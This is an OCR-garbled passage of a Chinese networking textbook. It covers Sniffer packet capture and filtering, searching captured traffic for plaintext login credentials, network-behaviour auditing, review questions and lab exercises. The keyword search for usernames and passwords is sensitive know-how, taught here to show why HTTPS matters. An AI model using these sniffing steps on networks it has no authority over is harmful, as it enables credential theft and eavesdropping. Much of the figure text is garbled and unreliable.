文 的 协议 类 型 ， Buffer 用 于 设置 捕 冲 区 
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图 7.50 设置 报 文 过 滤 条 件 


下 面 假设 在 网 络 层 捕 获 IP 地 址 为 192. 168. 168. 15 主机 的 所 有 通信 报 文 , 则 报 文 过 滤 
设置 界面 如 图 7.51 所 示 。 单 击 Dir. 列 的 图 标 , 还 可 选择 设置 报 文 数据 流 的 方向 ,默认 为 双 
向 数据 流 。 设 置 好 过 滤 条 件 后 , 单 击 * 确 定 ” 按 钮 ,完成 过 滤 条 件 的 设置 。 

设置 好 过 滤 条 件 后 ,重新 开始 对 报 文 进行 捕获 ,此 时 所 捕获 到 的 报 文 均 是 该 主机 发 送出 
去 的 或 收 到 的 报 文 。 对 所 捕获 的 报 文 的 解码 情况 如 图 7. 52 所 示 。 

利用 不 设 过 滤 条 件 的 报 文 捕获 ,发 现 某 主 机 有 异常 之 后 ,可 进一步 采取 设置 过 滤 捕获 ， 
仅 捕 获 与 该 主机 有 关 的 报 文 , 以 分 析 该 主机 的 通信 是 否 正常 ,还 是 感染 了 病毒 或 木马 ,正在 
对 网 络 中 的 其 他 主机 进行 攻击 。 对 于 病毒 或 木马 的 攻击 传播 ;通过 这 种 捕 包 分 析 , 可 发 现 其 
报 文 的 特点 ,如 所 使 用 的 TCP 端口 号 ,这 样 就 可 在 汇聚 层 的 三 层 交 换 机 上 通过 配置 ACL 过 
滤 规 则 ,将 病毒 或 木马 传播 报 文 给 禁止 掉 ,从 而 实现 防止 该 病毒 或 木马 的 传播 攻击 。 

4. 对 捕获 的 报 文 按 关 键 字 进行 查找 

对 捕获 到 的 报 文 ,还 可 按 关 键 字 查找 指定 的 报 文 内 容 。 例 如 , 若 想 捕获 用 户 登 录 系统 时 
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的 用 户 名 和 密码 信息 , 则 可 使 用 该 方法 在 所 捕获 的 报 文中 按 关 键 字 进行 搜索 获取 。 

在 报 文 捕获 后 ,选择 Decode 选项 卡 ,切换 到 如 图 7. 52 所 示 的 报 文 解码 页 面 ,在 顶部 的 
报 文 列表 框 中 的 任意 位 置 右 击 ,在 弹出 的 快捷 菜单 中 选择 Find Frame 选项 ,此 时 将 打开 如 
图 7.53 所 示 的 对 话 框 , 在 对 话 框 中 输入 要 搜索 的 关键 字 ,搜索 类 型 选择 Data ASCII, 然 后 
r - Capture 11 l| 


Summary Adàress |Data Pattern | Advanced | Baffer| Settings For 
Miress Known Address: Draeable) 


图 7.51 设置 按 IP 地 址 进行 过 滤 


[jsnifl: Decode, 4/908 Ethernet Frames 
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[192.168.168.15| [132.168 252. 25 SNMP: Get ifOutOctets 


192.168.252. 25] _168 168 Erra Roa Sii jooni - TUPU oct. 
[192.168.169.15|| 070946 LEN=0 
[124.89.30.138 0947 SEQ=3 


[192.168.168.15| 


24.89.30.1381 TCP: D-80 
89 30 138] HTTP 
32:16 168.15|TCP: D 
2.168.168.15|HTTP: R Port 
2 168 16A 15|TCP- ne324N 


Source address = [192.168.168.15] 
Destination address = [124.89.30.138] 
No options 


P 

P: Source port 3240 

P: Destination port = 80 (VUV/WVW-HTTP/HTTP) 

CP: Initial sequence number = 2052070946 

GPi alant aunactad, nushene 20S2020942, zi 


00000000: 00 e0 fc 23 cl £2 00 01 02 97 99 7b 08 00 


sA E 
$ c 7 拓 ?|7 


500990030: 90 30 Be S 40 00 90 06 bb 27 50 aS an 0f 7c 5S 
00000020: 1e 3. persson O 7a SD le 22 o0 00 09 00 7002 Dy EE a 
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\Expert À Decode Á Matrix À Host Table A Protocol Dist. Statistics 7 


图 7.52 对 捕获 到 的 SYN 报 文 解码 


Text |Data | Status| Ezpert| 


Ë 


Se 中 C Saary tex 全 Data ASCI 
a C Detail te C Data Hex 


F Match case 
Search Ci G pom 


图 7.53 输入 要 搜索 的 关键 字 
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单 击 “ 确 定 ” 按 钮 ,之 后 Sniffer 将 在 所 捕获 的 报 文中 搜索 含有 该 关键 字 的 报 文 , 按 F3 键 ,可 
搜索 下 一 个 含有 该 关键 字 的 报 文 ,通过 查看 报 文 的 解码 内 容 , 即 可 找到 含有 用 户 名 和 密码 的 
报 文 ,如 图 7.54 所 示 。 


LSnife: Decode, 755/883 Ethernet Frames 


sysUpTine 
SNMP etreply sysUpTine = 184668188 ticks 
SNMP fOutOctet: 


1.13] 
192 168 _168_15 
192 168 16815 


9: Content-Length: 30 
tion: Keep-Alive 
Cache-Control: no-cache 


3: Content: (30 bytes of data) 


61 74 65 Od Qa 
` 2f 34 2e gent: Mozilla/4 
20 4d 0 (compatible: M 
73 SIE 6.0: Windovs 
48 NT 5.1; SV1)..H 
6 38 ost: 192.168.168 
5 5e .15. Content-Len 
30. .Connect 
n; Keep-Alive 


图 7.54 搜索 到 用 户 名 和 密码 的 报 文 解码 


从 图 7. 54 的 报 文 解码 内 容 可 见 , 用 户 提交 的 用 户 名 和 密码 登录 信息 包含 在 该 报 文 中 ， 
是 192. 168. 168. 6 的 主机 向 IP 地 址 为 192. 168. 168. 15 的 Web 服务 器 提交 的 ,使 用 HTTP 
协议 提交 ,根据 报 文 的 解码 内 容 “txtusername 一 admin&txtpwd 王 24361? 可 知 , 登 录 的 用 户 
名 为 admin, 用 户 密码 为 24361 。 

从 中 可 见 , 用 户 登录 提交 页 面 ,不 对 用 户 名 和 密码 进行 加 密 提交 的 做 法 是 极 不 安全 的 ， 
登录 的 用 户 名 和 密码 ,可 被 网 内 的 任何 用 户 使 用 Sniffer 之 类 的 软件 捕获 并 获得 用 户 账户 和 
密码 。 因 此 ,为 提高 Web 应 用 程序 的 安全 ,应 尽量 配置 使 用 安全 的 Web 服务 器 ,使 用 
HTTPS 协议 进行 数据 提交 。 另 外 ,在 网 页 编程 方面 ,对 要 提交 的 重要 数据 ,应 采取 先 加 密 
后 提交 的 方式 ,以 防止 数据 在 网 络 传输 过 程 中 被 泄密 。 


7.3 网 络 内 容 审计 


1. 内 容 审计 简介 
网 络 内 容 审 计 属 于 信息 安全 管理 范畴 , 它 是 在 应 用 层 对 网 络 传输 的 报 文 内 容 进行 分 析 、 
监控 记录 和 审核 ,实现 对 用 户 上 网 行为 的 安全 管理 和 监控 。 
对 于 网 络 管理 人 员 ,必须 防范 网 内 用 户 在 论坛 上 发 布 不 良言 论 , 若 不 能 从 管理 层面 彻底 
解决 该 问题 , 则 必须 从 技术 角度 ,通过 上 网 行为 管理 系统 记录 各 用 户 的 上 网 行为 以 备查 。 
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上 网 行为 管理 系统 可 对 用 户 上 网 的 所 有 操作 行为 和 收发 的 数据 内 容 进 行 记 录 。 

目前 ,提供 上 网 行为 管理 系统 的 厂商 较 多 .本 节 以 网 康 为 例 ,简要 介绍 利用 该 设备 对 网 
络 内 容 进行 监控 审计 的 操作 方法 。 

2. 设备 的 连接 使 用 

提供 上 网 行为 管理 的 设备 系统 一 般 同时 还 兼 具 网 络 流量 控制 功能 。 若 要 使 用 其 流 控 功 
能 , 则 应 将 设备 以 网 桥 模式 串 接 在 核心 交换 机 与 出 口 路 由 器 或 出 口 防火 墙 之 间 。 若 不 使 用 
其 流 控 功 能 ,只 使 用 其 上 网 行为 管理 功能 , 则 可 以 旁 路 方式 接 在 核心 交换 机 上 。 

设备 安装 连接 和 配置 好 后 ,就 会 自动 记录 所 有 用 户 的 上 网 行为 。 管 理 员 只 需 利 用 其 提 
供 的 Web 服务 ,通过 网 页 方式 搜索 查看 或 监控 用 户 的 上 网 行为 。 

3. 使 用 上 网 行为 管理 系统 

(1) 登录 上 网 行为 管理 系统 

上 网 行为 管理 系统 使 用 安全 Web 服务 ,进入 系统 之 前 必须 经 过 用 户 名 和 密码 的 身份 验 
证 。 验 证 通过 后 , 即 可 进入 管理 系统 的 主 界面 ,如 图 7. 55 所 示 。 


网 康 本 联网 控制 癌 关 


Eueu x” 互联 网 控制 网 关上 


š umasa EE mams: pa mma :mx 
B HAP mesig: Bd ao SORUN: 水 久 有 有效 
EE A paai 

g ' arse : 

z 国 Wammol: 4:03 2 

H WALL... Maswa [Mr =] 

d == miwan urens 

* ki a 

询 “o. 

i 


CLERI 


T H = 
maa 


MARHA 
系统 当时 则 : 2010-12-16 17:5350 FR: 2010.11.25 10:01:00 FBAR : 20 天 7 时 47 分 


系统 当前 时 间 = 0101251753 


图 7.55 上 网 行为 管理 系统 主 界面 


(2) 系统 监控 

在 系统 监控 功能 组 中 提供 了 对 系统 状态 、 网 络 活动 、 上 线 用 户 、 活 跃 用 户 、 流 量 监控 、 应 
用 监控 等 方面 的 实时 监控 。 

单 击 “ 网 络 活动 ”按钮 ,可 切换 到 对 网 络 活动 进行 监控 的 页 面 ,如 图 7. 56 所 示 。 

流量 监控 可 查看 到 网 内 各 种 网 络 应 用 的 流量 排名 和 用 户 流量 的 排名 情况 ,如 图 7. 57 
所 示 。 
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图 7.56 监控 网 络 活动 
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图 7.57 网 络 应 用 服务 的 流量 监控 
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(3) 查询 统计 

对 用 户 上 网 行为 的 管理 ,常用 的 主要 是 其 查询 统计 功能 ,利用 该 项 功能 ,可 按 关键 字 在 
记录 的 数据 中 查询 检索 网 内 用 户 是 否 发 了 含 某 方面 关键 字 的 贴 子 , 若 有 , 则 会 检索 显示 出 发 
贴 的 URL 地 址 ,发 贴 者 的 IP 地 址 ,发 贴 时 间 和 发 贴 内 容 等 信息 。 

选择 “查询 统计 ”选项 卡 ,切换 到 查询 统计 功能 页 面 ,该 功能 项 下 面 又 细 分 了 若干 子 功能 
项 ,如 图 7. 58 所 示 。 
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图 7.58 查看 对 网 站 的 访问 情况 


若 要 查看 论坛 的 发 贴 情况 , 则 单 击 “ 论 坛 发 贴 "按钮 ,此 时 将 显示 出 网 内 所 有 用 户 的 发 贴 
情况 ,如 图 7. 59 所 示 。 

每 一 个 贴 子 均 有 一 个 “发 贴 查看 "链接 , 单 击 该 链接 即 可 查看 发 贴 内 容 ,如 图 7.60 所 示 。 

由 于 发 贴 内 容 很 多 ,不 可 能 逐一 查看 ,通常 设置 过 滤 关键 字 进 行 自动 查找 。 在 如 图 7. 59 
所 示 页 面 的 顶部 , 单 击 “选择 操作 ?按钮 ,将 下 拉 出 功能 菜单 ,选择 “设置 过 滤 条 件 " 选 项 ,此 时 
将 打开 如 图 7.61 所 示 的 "过 滤 条 件 设置 "对 话 框 。 可 设置 URL 关键 字 或 内 容 关 键 字 ,设置 
好 后 单 击 “ 开 始 查询 ”按钮 , 即 可 将 含有 指定 关键 字 的 贴 子 过 滤 筛 选 出 来 。 

通过 这 个 系统 可 见 , 只 要 是 明文 传输 的 信息 都 可 以 被 记录 和 查看 。 若 要 保密 通信 ,必须 
采用 加 密 传 输 方 式 。 对 于 邮件 收发 ,邮件 服务 器 可 配置 使 用 SMTPS 和 POP3S 协议 来 对 邮 
件 进 行 加 密 传输 。 对 于 论坛 所 在 的 网 站 , 若 配置 使 用 安全 Web 服务 ,使 用 HTTPS 协议 来 
传输 网 页 数据 , 则 上 网 行为 管理 系统 是 无 法 查看 到 用 户 的 发 贴 内 容 的 ,只 能 记录 到 用 户 的 访 
问 记录 ,如 图 7.62 所 示 。 
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图 7.59 查看 论坛 发 贴 情况 
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图 7.60 查看 发 贴 内 容 
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图 7.62 查看 HTTPS 审计 
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3 题 7 


1. 以 下 关于 网 络 流量 监控 的 描述 ,不 正确 的 是 ( js 
A. 网 络 流量 监控 能 直观 反映 网 络 的 运行 状态 和 各 端口 的 流量 大 小 
B. 网 络 流量 监控 软件 可 替代 网 管 软件 的 功能 
C. 网 络 流量 监控 一 般 通过 SNMP 协议 来 获得 网 络 设备 的 流量 
D. 网 络 流量 监控 软件 可 获得 物理 端口 的 流量 ,也 可 获得 VLAN 虚拟 接口 的 流量 
2. 以 下 关于 网 络 流量 监控 软件 的 描述 ,不 正确 的 是 ( Jis 
A. PRTG 和 MRTG 都 是 免费 软件 
B. MRTG 是 开源 免费 软件 ,PRTG 是 商业 软件 ,其 商业 版 本 不 是 免费 的 
C. MRTG 运行 在 Linux 或 UNIX 平台 上 ,而 PRTG 运行 在 Windows 平 台 上 
D. 要 使 PRTG 或 MRTG 能 正常 捕获 到 网 络 设 备 的 流量 ,必须 在 网 络 设备 上 配置 
SNMP 的 团体 名 称 (community) 
3. 网 管 人 员 通 常会 使 用 Sniffer 软件 来 分 析 诊断 网 络 故障 ,以 下 关于 Sniffer 软件 的 描 
述 ,正确 的 是 ( Ye 
A. Sniffer 可 以 直接 操作 被 管 的 网 络 设 备 
B. Sniffer 可 以 通过 定义 过 滤 来 捕获 感 兴趣 的 报 文 
C. Sniffer 可 以 捕获 被 路 由 器 隔 开 的 不 同 网 段 上 的 所 有 的 数据 报 文 
D. Sniffer 需要 知道 被 管 设备 的 团体 名 称 
4. 在 Sniffer 中 ,可 以 使 用 ( ) 查 看 带宽 占用 最 多 的 前 10 名 使 用 者 。 


A. Dashboard B. Global Statistics 
C. Matrix—>Bar D. Host Table 
5. 关于 Sniffer 软件 中 的 Dashboard 的 描述 ,不 正确 的 是 ( Fa 
A. 可 以 显示 网 络 的 使 用 率 B. 可 以 显示 网 络 中 每 秒 通过 的 报 文 数 量 
C. 可 以 显示 用 户 信息 D. 可 以 显示 网 络 中 每 秒 的 错误 数 


6. 关于 Sniffer 软件 中 的 Matrix 的 描述 ,不 正确 的 是 ( Jo 
A. 可 以 显示 网 络 中 不 同 主机 的 连接 情况 
B. 可 以 根据 IP 地 址 显示 不 同 主机 间 的 连接 情况 
C. 可 以 根据 MAC 地 址 显示 不 同 主机 间 的 连接 情况 
D. 可 以 显示 网 络 中 主机 的 用 户 名 
7. 对 于 Cisco 路 由 器 , 若 要 配置 团体 名 为 cqtbi. 使 PRTG 软件 能 读 取 到 路 由 器 的 流量 
信息 ,以 下 配置 命令 中 ,正确 的 是 ( Jo 
A. router(config)# snmp-server community cqtbi RO 
B. router(config) # snmp-server community cqtbi RW 
C. router(config) # snmp-server community RO cqtbi 
D. router(config)# snmp-server community RW cqtbi 
8. 企业 在 内 网 部 署 SNMP 后 .网管 人 员 不 希望 SNMP 消息 在 企业 网 的 外 部 被 接收 ,此 
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时 应 在 边界 路 由 器 外 网 接口 的 in 方向 配置 ( ) 规 则 。 

A. router(config) # access-list 101 deny udp any any eq 161 

B. router(coníig) # access-list 1 deny udp any any eq 161 

C. router(config) # access-list 101 deny tcp any any eq 161 

D. router(config) # access-list 1 deny tcp any any eq 161 

9. 在 局 域 网 内 ,为 保证 SNMP 协议 的 正常 工作 ,在 各 汇聚 层 交 换 机 和 核心 交换 机 上 ， 

必须 保证 不 要 拦截 ( ) 端 口 。 

A. TCP 161 B. UDP 161 C. TCP 162 D. UDP 162 


实 训 7.1 使 用 PRTG 进行 流量 监控 


【 实 训 目的 】 掌握 利用 PRTG 软件 对 网 络 流量 进行 监控 的 配置 和 使 用 方法 。 

【 实 训 环 境 与 软 硬 件 设 备 】 

1. 实 训 环境 

利用 本 校 真 实 网 络 环境 进行 实 训 。 联 系 学 校 网 络 中 心 技术 人 员 , 在 学 校 核心 交换 机 上 
以 只 读 (RO) 模 式 开启 并 设置 SNMP 团体 名 称 ,以 保证 PRTG 软件 能 读 取 到 核心 交换 设备 
上 的 网 络 流量 信息 。 

2. 软 硬件 设备 

在 实 训 机 房 中 进行 实 训 操作 ,保证 一 人 一 台 计 算 机 ,操作 系统 可 为 Windows XP、 
Windows 2003 Server 或 Windows 7, PRTG 6. 0. 5. 451 Commercial Edition 版 本 软件 一 套 。 

【 实 训 内 容 与 步骤 】 

(1) 请 求学 校 网 络 中心 技 术 人 员 协 助 ,在 学 校 核心 交换 机 上 配置 SNMP 团体 名 称 , 并 
告诉 核心 交换 机 的 IP 地 址 和 SNMP 团体 名 。 

(2) 在 Windows 操作 系统 中 安装 PRTG 软件 。 

(3) 在 PRTG 软件 中 添加 Sensor, 实 现 对 选 定 的 交换 机 端口 的 网 络 流量 进行 监控 。 

(4) 配置 PRTG 流量 发 布 网 站 ,然后 利用 IE 浏览 器 访问 PRTG 流量 监控 网 站 。 

(5) 配置 PRTG 流量 报告 ,设置 按 指定 的 时 间 以 发 邮件 方式 ,将 流量 报告 发 送 到 指定 的 
邮箱 。 


实 训 7.2 使 用 Sniffer 进行 捕 包 分 


【 实 训 目的 】 掌握 利用 Sniffer 软件 进行 捕 包 、 对 报 文 解码 分 析 的 方法 。 
【 实 训 环境 与 软 硬 件 设备 】 


1. 实 训 环境 
利用 实 训 机 房 的 真实 网 络 环境 进行 实 训 ,在 实 训 机 房 所 在 的 网 段 中 进行 捕 包 实 训 。 
2. 软 硬 件 设备 


在 实 训 机 房 中 进行 实 训 操作 ,保证 一 人 一 台 计 算 机 ,操作 系统 可 为 Windows XP. 
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Windows 2003 Server 或 Windows 7。Sniffer 4. 70. 530 软件 一 套 。 

【 实 训 内 容 与 步骤 】 

(1) 安装 Sniffer 软件 。 

(2) 设置 捕获 报 文 所 使 用 的 网 卡 。 

(3) 使 用 Matrix 功能 项 .查看 了 解 当前 网 段 的 网 络 连 接 情况 ,流量 排名 统计 图 等 相关 
信息 。 

(4) 使 用 Host Table 功能 ,以 IP 地 址 查看 方式 ,查看 了 解 当前 网 络 中 活跃 主机 的 流量 
信息 。 

(5) 捕获 一 定数 量 的 报 文 , 然 后 查看 报 文 , 并 对 感 兴趣 的 报 文 进行 解码 ,查看 了 解 报 文 
的 解码 内 容 。 并 利用 自己 所 学 的 网 络 理论 知识 ,检查 自己 能 否 阅 读 理解 报 文 解码 后 的 内 容 。 
使 用 Matrix 功能 ,并 利用 IP 地 址 查看 方式 ,查看 所 捕获 报 文 的 连接 图 表 。 

(6) 开始 捕获 后 ,登录 某 个 系统 ,登录 完毕 后 ,结束 报 文 捕获 。 然 后 在 所 捕获 的 报 文中 
检索 user 或 pass XEF , 试 着 查找 刚才 登录 的 用 户 名 或 密码 。 登 录 的 系统 若是 加 密 提 交 ， 
则 在 捕获 的 报 文 解 码 中 ,看 到 的 是 加 密 后 的 密 文 。 

(7) 设置 报 文 过 滤 条 件 , 只 捕获 某 一 台 主 机 收发 的 报 文 , 然 后 查看 所 捕获 的 报 文 。 
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